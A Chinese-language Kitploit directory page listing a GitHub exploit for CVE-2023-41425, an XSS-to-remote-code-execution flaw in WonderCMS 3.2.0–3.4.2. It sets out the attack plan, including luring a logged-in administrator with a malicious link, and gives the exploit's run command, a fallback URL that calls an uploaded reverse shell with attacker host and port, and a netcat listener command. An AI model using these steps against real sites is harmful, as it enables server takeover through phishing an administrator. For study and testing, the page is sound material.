Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-41425-WonderCMS-Authenticated-RCE — XSS注入,WonderCMS 3.2.0 -3.4.2 | Kitploit
工具/GitHubGitHub/diegomjx/cve-2023-41425-wondercms-authenticated-rce
钓鱼工具Payload生成漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubdiegomjx/cve-2023-41425-wondercms-authenticated-rce

CVE-2023-41425-WonderCMS-Authenticated-RCE

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

XSS注入,WonderCMS 3.2.0 -3.4.2

查看仓库
141年前尚未审核

CVE-2023-41425-WonderCMS-Authenticated-RCE

描述

WonderCMS v3.2.0 - v3.4.2 存在漏洞。远程攻击者可以通过跨站脚本(XSS)攻击完全控制服务器(仅供教育目的)。以下是攻击计划:

工作原理:

该漏洞利用 WonderCMS 的 installModule 组件,偷偷植入一个运行任意代码的恶意脚本。

设置

  • 工具:exploit.py
  • 必要条件:
    • 安装了 WonderCMS 的目标 URL(无需管理员密码)。
    • 攻击者机器的 IP 地址。
    • 监听反向 Shell 的端口。

逐步执行

  1. 脚本生成一个名为 xss.js 的文件。这个 JavaScript 武器旨在利用反射型 XSS 漏洞。
  2. 它会输出一个恶意链接。你需要将该链接发送给管理员。
  3. 当管理员(已登录用户)打开或点击你的链接时,神奇的事情发生了:
  • 未经其同意触发后台请求。
  • 通过主题/插件上传功能上传一个反向 Shell 有效负载。
  1. 上传后,有效负载执行,并为你提供直接连接到目标服务器的反向 Shell。
root@kitploit:~
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>

示例

root@kitploit:~
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234

故障安全:

如果反向 Shell 未自动触发,请直接访问:

root@kitploit:~
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>

注意:

记住使用以下命令启动监听器:

root@kitploit:~
nc -lvp 4444

致谢

感谢 prodigiousMind 发现并报告此漏洞 https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413

下载工具